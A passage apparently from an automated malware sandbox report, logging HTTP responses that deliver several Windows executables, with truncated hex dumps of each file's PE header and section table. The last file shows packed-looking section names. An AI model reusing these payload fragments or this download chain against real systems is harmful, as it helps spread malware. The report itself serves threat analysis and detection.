00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Nov 2024 08:06:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Nov 2024 08:06:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Nov 2024 08:06:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Nov 2024 08:06:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Nov 2024 08:06:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Nov 2024 08:06:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Nov 2024 08:06:55 GMTContent-Type: application/octet-streamContent-Length: 1947648Last-Modified: Wed, 27 Nov 2024 08:02:27 GMTConnection: keep-aliveETag: "6746d213-1db800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4d 00 00 04 00 00 f7 1f 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 cb 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 cb 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2b 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 71 6d 6c 63 6a 64 65 00 a0 1a 00 00 30 32 00 00 9c 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 